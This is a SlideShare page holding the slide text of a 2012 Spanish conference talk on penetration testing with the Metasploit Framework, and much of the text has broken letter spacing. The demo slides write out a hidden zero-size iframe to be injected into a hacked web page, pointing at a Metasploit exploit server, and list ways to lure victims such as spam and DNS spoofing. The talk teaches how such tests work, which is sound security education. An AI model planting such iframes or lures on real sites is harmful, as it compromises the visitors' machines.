Diese Präsentation wurde erfolgreich gemeldet.
Wir verwenden Ihre LinkedIn Profilangaben und Informationen zu Ihren Aktivitäten, um Anzeigen zu personalisieren und Ihnen relevantere Inhalte anzuzeigen. Sie können Ihre Anzeigeneinstellungen jederzeit ändern.

Pentesting con metasploit framework

867 Aufrufe

Veröffentlicht am

Charla impartida por Pablo González, de la empresa Informática 64 para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.

Veröffentlicht in: Technologie
  • Als Erste(r) kommentieren

  • Gehören Sie zu den Ersten, denen das gefällt!

Pentesting con metasploit framework

  1. 1. Pe n t e s t i n g c o n Me t a s p l o i t F r a me w o r k Pablo González
  2. 2. ¿Qué e sMe t a s p l o i t ?Es e l c a o s , p u r o y b e l l o p o rf u e r a , e t e r n o y c o mp l e j o p o rd e n t r o , e s p u r o p e n t e s t i n g …
  3. 3. Ag e n d a1. A r q u i t e c t u r a d e Me t a s p l o i t2. Fases de un test de intrusión3. ¿Dónde p a r t i c i p a Me t a s p l o i t ?4. El arte de la intrusión5. El bien y el mal…6. D e m o7. L a t i e n d a e n c a s a
  4. 4. Ar q u i te c t u r a ?
  5. 5. Fases Test Intrusión
  6. 6. Fa s e sAlcance y términos del test de intrusiónRecolección de informaciónAnálisis d e v u l n e r a b i l i d a d e sExplotación d e v u l n e r a b i l i d a d e sPost-Explotación d e l s i s t e m aGeneración d e i n f o r m e s
  7. 7. ¿Dóndep a r t i c i p a ?
  8. 8. Lo importante es…P a r t i c i p a r !!!Recolección de informaciónAnálisis d e v u l n e r a b i l i d a d e sExplotación d e v u l n e r a b i l i d a d e sPost-ExplotaciónPero incluso… a y u d a a
  9. 9. El arte de la intrusión
  10. 10. ¿Arte o Ingeniería? Pr o c e d u r e p e n t e s t i n g ; B E GI N wr i t e l n („p a s o 1‟) wr i t e l n („p a s o 2‟) … a r t e ; END; Pr o c e d u r e a r t e ; …
  11. 11. ÁmbitoExplotación vulnerabilidades (pero…)B e s t a n d Wo r s tPr a c t i c e s
  12. 12. Elección d e l p a y l o a dMás d e 200 p a y l o a d s …Son nuestras cartas… ¿Siempreu s a r e mo s a l r e y ?
  13. 13. Tipos de Intrusión¿Cómo l a n z o l o se x p l o i t s ? Sin Interacción… (t e r r o r !) Con Interacción… (c l i e n t -s i d e a t t a c k !)
  14. 14. Cl i e n t Si d e At t a c k !D a r k S h a d o w s , ¿Cómo hago paraque hagan peticiones a mí?M a i l i n g ? (s p a m ? ? ) Foros… Páginas w e b h a c k e a d a s …P u b l i c a c i o n e s e n I n t e r n e tA c o r t a d o r e s …A t a q u e s l o c a l e s (D N S Sp o o f )
  15. 15. El bien y el mal…
  16. 16. El límiteDebemos ser éticos… ¿Lo s o m o s ?La delgada línea…P o d e mo s u t i l i z a r l o sa t a q u e s c l i e n t -s i d ep a r a : (m u c h a s , m u c h a sc o s a s ) Distribución malware… P a y l o a d s p e r ma n e n t e s
  17. 17. D e mo : Aj u g a r !
  18. 18. ¿Qué v a m o s a h a c e r ?Escenario: (idea del mundo real… ^ ^ )1. Página h a c k e a d a …2. I f r a m e q u e a p u n t e a 1 s e r v e r c o n MS F3. L a n z a m i e n t o d e e x p l o i t s c o n t r a c l i e n t e4. Obtenemos el control…
  19. 19. I f r a me …<i f r a m es r c =h t t p ://192.168.56.101:8080/ w i d t h =0 h e i g h t =0s t y l e =“h i d d e n ”f r a m e b o r d e r =0m a r g i n h e i g h t =0m a r g i n w i d t h =0/>
  20. 20. L a t i e n d a e n c a s a
  21. 21. He tenido el honor……y han tenido la paciencia…Me t a s p l o i t p a r aPe n t e s t e r s

×